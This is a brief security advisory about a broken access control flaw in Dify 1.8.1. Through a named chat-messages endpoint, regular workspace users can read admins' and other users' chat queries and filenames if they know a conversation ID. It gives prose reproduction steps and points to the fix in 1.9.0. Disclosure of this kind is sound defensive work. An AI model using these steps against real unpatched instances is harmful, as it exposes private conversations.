Dify Broken Access Control Vulnerability in Chat Message Endpoint Allows Unauthorized Message Reading

A broken access control vulnerability has been identified in Dify version 1.8.1, specifically on the '/console/api/apps/<APP_ID>/chat-messages?conversation_id=<CONVERSATION_ID>&limit=10' endpoint. This vulnerability allows users within the same workspace to access and read chat messages from other users. Regular users can view the query data and filenames associated with admin and potentially other users' chats, provided they know the conversation ID. This issue compromises the confidentiality of chat messages. The vulnerability has been patched in version 1.9.0.

Impact

Exploitation of this vulnerability allows regular users to read chat messages and associated metadata from admin and other users, if the conversation ID is known. This unauthorized access to chat content significantly breaches confidentiality.

Reproduction

The vulnerability can be reproduced by sending a GET request to the chat messages endpoint with a valid conversation ID. If the request is made with a regular user's bearer token, the response will include chat messages from other users, including admins.

Remediation

Users can update to Dify version 1.9.0 or later, where this vulnerability has been fixed.